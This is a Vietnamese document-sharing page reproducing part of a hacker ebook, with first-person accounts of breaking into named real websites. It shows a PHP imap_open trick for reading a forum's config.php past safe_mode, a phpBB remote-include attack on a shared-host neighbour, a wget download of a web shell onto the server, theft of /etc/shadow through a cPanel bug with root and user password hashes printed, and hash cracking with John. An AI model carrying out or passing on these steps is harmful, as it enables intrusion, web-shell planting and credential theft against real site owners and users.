1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 308 pps

6 117 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 181,06 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Kiếm path của victim: Đây là bước cũng rất là quan trọng vì nếu muốn đập nhà mà không có địa chỉ làm sao mà đập?. Bây giờ mình cần biết info trong file config của forum nó!. 2 cái nêy cũ

Trang 1

safe_mode: ON PHP version: 4.4.2 cURL: ON MySQL: ON MSSQL: OFF

PostgreSQL: OFF Oracle: OFF

Disable functions : NONE

2 Kiếm path của victim:

Đây là bước cũng rất là quan trọng vì nếu muốn đập nhà mà không có địa chỉ làm sao mà đập ? đập vào đâu ? victim nhà ở đâu ? Cách tốt nhất là vào web nó, kiếm những file nó code bị error nên hiện ra path ! thử nào

Tình cờ tui vào admincp của nó xem thế nào và có file vbmusic.php gì gì đó click vào :

boom trời giúp ta ! hiện ra error file /global.php is not found ! sht

path: để an toàn cho nhactre.biz nên path ở đây được che dấu 1 phần !

Code:

/mounted-storage/home19b/sub001/sc19699-SCRXP/nhactre.biz/forum/admincp/vbmusic.php

rồi attack nó nào uhmmmmm

read file() nó nào rồi php-bypass trong con nr57 không chơi được thử chiêu khác trong con shell cũng không ! lập tức tui vào đọc bài này:

https://hcegroup.biz/forums/showthread.php?t=440

rồi, áp dụng liền !

Bây giờ mình cần biết info trong file config của forum nó ! ->

/forum/includes/config.php

ô php eval()

Code:

$vnforce =

@imap_open("/mounted-storage/home19b/sub001/sc19699-SCRXP/nhactre.biz/forum/includes/config.php", "", "");

$result = @imap_body($vnforce, 1);

echo $result; @imap_close($vnforce);

sht ra roài hehe ! ngang đây thì chắc không cần nói tiếp nữa ! chúc vui tại HCE !

(c) HcEgRoUp.biz

?>

How I Hack Pleikucity.net

Hêc ! Ngồi chán chán hẽm biết lêm gì ! Nhớ hồi bữa có hack thằng Pleikucity.net

vì lý do xin cái style mê nó hẽmcho ! hêc !

Trang 2

Hacked By : Windak , langtuhaohoa , yeuemdaikho ( hcegroup.net )

Okies ! Bắt đầu nèo

Mục tiêu : Pleikucity.net

Thông tin đã có về mục tiêu : Sêi shared hosting , Saì Open Source XOOPS ( 2 cái nêy cũng đủ để mần ăn nó rồi )

Sau mê dòng lượn que lượn lại lt cũng nhặt được vêi của rơi của XOOPS :

Inclusion file bug:

Code:

include_once

XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/misc.php';

Biết lê nó bị remote include file nhưng chã biết khai thác sao cả ! hêc ! Mò 1 hồi vẫn ko biết cách khai thác vì nếu muốn include file thì mình phải có 1 file misc.php trên host của victim nhưng bây giờ chưa có gì trong tay sao mê up file misc.php lên ??? mê nếu đã up được lên rồi thì cần gì sêi bug nêy nữa ??? hì hì ! Thiết nghĩ bug nêy vô dụng nên bỏ qua

Chuyển hướng sang local attack thữ xem ( cái trò nêy langtu cũng ko thick chút nêo nhưng buột thế rồi biết sao đây mục đêch của mình lê skin của thằng pleiku

để phát triển ý tưởng mê hêc *"18.gif"* )

lach cạch lạch cạch : whois.sc/pleikucity.net > reverse IP -> 350 Results for 67.15.40.4 (Pleikucity.net)

hêc hêc ! Bây giờ sao đây ?? ngồi dò xem thữ site nêo trong 350 đó dênh bug êh

??? huhuh má ơi

hừhm hừhm ! lt chọn phpBB lê mục tiêu vì phpBB có nhiều bug rất củ chuối có thể chiếm được quyền shell !

lụm được khoảng gần chục em sêi phpBB chọn đại 1 thằng vê lt chọn :

http://www.sickpuppyrecords.com/

kkhì khì ! loay hoay đâu khoảng 10 phút langtu đã có 1 shell ảo trên host nó thông

Trang 3

qua bug remote include file ! hêc ! Vê việc bây giờ lê phải lêm sao up được 1 con remv php lên host để tiện cho việc sữ dụng sau nêy ! OKies

Code:

ls -al

thấy folder uploads của nó chmod 777 nên ta sẽ up vêo đó ! nhưng up nếu up trực tiếp = file php thì sẽ ko được vì *nix ko chấp nhẪn ! như vẪy ta dùng :

Code:

cd /uploads

Code:

wget haylam.com/xxx/c98.zip

Code:

unzip c98.zip

bây giờ thữ xem :

http://www.sickpuppyrecords.com/phpBB/uploads/c98.php

ặc ặc đã thênh công Vì mới nãy ta up thông qua exploit của forum nên ta cũng có owner tương đương với user của nó lê : sickpupp/sickpupp

hihi ! có lẽ đã nhai được cái gì goêi đây , serv nêy config hơi bị củ chuối

Code:

cat /home/sickpupp/.contactemail

OKies ! tiến hênh forgot pass login vêo Cpanel ! hehe ! Có 1 Cpanel rồi lt tênh chơi trò forgot tiếp để vêo thằng Pleiku nhưng ko được Cpanel đã fix !

VẪy đênh thữ get root ? Okies !

Vêo ftp up lên con cgi-telnet rồi "ln " shadow file ra ! OK ! đã ln được shadow file nhưng chỉ có root mới sêi nó được ( điều dĩ nhiên ) Lợi dụng bug của Cpanel 9x loay hoay 1 hồi đã có file shadow trên máy ! hê hê

Code:

root:$1$.miKBOEg$JfX3vJw.O9FykqZPnURaW1:13126:0:99999:7:::

bin:*:12552:0:99999:7:::

daemon:*:12552:0:99999:7:::

Trang 4

adm:*:12552:0:99999:7:::

lp:*:12552:0:99999:7:::

sync:*:12552:0:99999:7:::

shutdown:*:12552:0:99999:7:::

halt:*:12552:0:99999:7:::

mail:*:12552:0:99999:7:::

news:*:12552:0:99999:7:::

uucp:*:12552:0:99999:7:::

operator:*:12552:0:99999:7:::

games:*:12552:0:99999:7:::

gopher:*:12552:0:99999:7:::

ftp:*:12552:0:99999:7:::

nobody:*:12552:0:99999:7:::

rpm:!!:12552:0:99999:7:::

vcsa:!!:12552:0:99999:7:::

nscd:!!:12552:0:99999:7:::

sshd:!!:12552:0:99999:7:::

rpc:!!:12552:0:99999:7:::

rpcuser:!!:12552:0:99999:7:::

nfsnobody:!!:12552:0:99999:7:::

mailnull:!!:12552:0:99999:7:::

smmsp:!!:12552:0:99999:7:::

pcap:!!:12552:0:99999:7:::

xfs:!!:12552:0:99999:7:::

ntp:!!:12552:0:99999:7:::

desktop:!!:12552:0:99999:7:::

apache:!!:12552:0:99999:7:::

webalizer:!!:12552:0:99999:7:::

squid:!!:12552:0:99999:7:::

postfix:!!:12552:0:99999:7:::

netdump:!!:12552:0:99999:7:::

mysql:!!:12552::::::

admin:$1$PrSVkYWg$0C/Hd2YV1U./2ieVlHmom.:13126:0:99999:7::: cpanel:*:12552::::::

mailman:*:12552::::::

fanadmin:$1$qZPyxcUN$RbE9OFyZLvTRU4/JYj2MK0:13103:::::: fuitad14:$1$VHeHhUVS$3MUnZJCjId/o49hJ886aS/:12553::::::

crawfojj:$1$vbD6e7i9$aQfQIS6y2IW8gi9QpJJOv1:12556::::::

Trang 5

vì mục đêch an toên nên ko post hết chỉ tượng trưng thôi

oêi ! Mới đi ăn bún riu dưới LTKiệt ( tp.BMT ) về hơi no no Thôi cũng đênh viết tiếp cho kết thúc câu chuyện

Điều bây giờ tất yếu phải lêm lê lôi John ra crack shadow pass rồi

Chờ khoảng 1 tiếng thấy nó crack được khoảng hơn 40 pass , đợi tiếp , đợi wêi đợi wêi chã thấy ra pass root hay pleiku ! hêc ! Nãy giờ ngồi tiền net hết mẹ gần 7 ngên mê giờ có 5 ngên ! Gồng 2 ngên rồi ! hêc !

Sốt ruột quá , với lại thiết nghĩ sẽ crack ko ra được vì john chỉ crack được những pass đơn giản thôi ! hêc !

Giờ chẳng lẽ quay lại hack lại từ đầu ??? sót tiền net dã man nhưng vì mục tiêu nên quyết định chơi tiếp !

quay lại con cgi-telnet mới nãy mới up :

Code:

ls -al /home/pleiku/public_html/html/

folder uploads của nó chmod 777 thấy tưởng đâu ngon ăn up 1 em c98 lên !

Up thênh công thấy mừng mừng !

Liên qua browser : http://www.pleikucity.net/html/uploads/c98.php

oác oác oác sao lại error 500 ?? hêc ! Thữ up thêm vêi con nữa vẫn error 500 dù file perl hay php hêc !

Cảm thấy đau tiền net rồi nghen Bỏ tiền ra ngồi nãy giờ mê hem lêm được gì lê điên lắm á ! hêc !

Nghĩ đi nghĩ lại sao lại error 500 ?? Phải chăng serv nêy PHP chạy dưới dạng CGI

??? chắc lê thêa rồi ! hêc ! Với lại owner của mình lê sickpupp/sickpupp mê lại up sang chỗ của thằng pleiku/plieku liệu có được ko ?? vì còn noob nên bỏ qua vấn

đề nêy !

Trang 6

Quay đi quay lại á chết bê mêy goêi nhá !

Còn nhớ mới nãy ta thấy XOOPS có 1 bug inclusion file ko ???

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN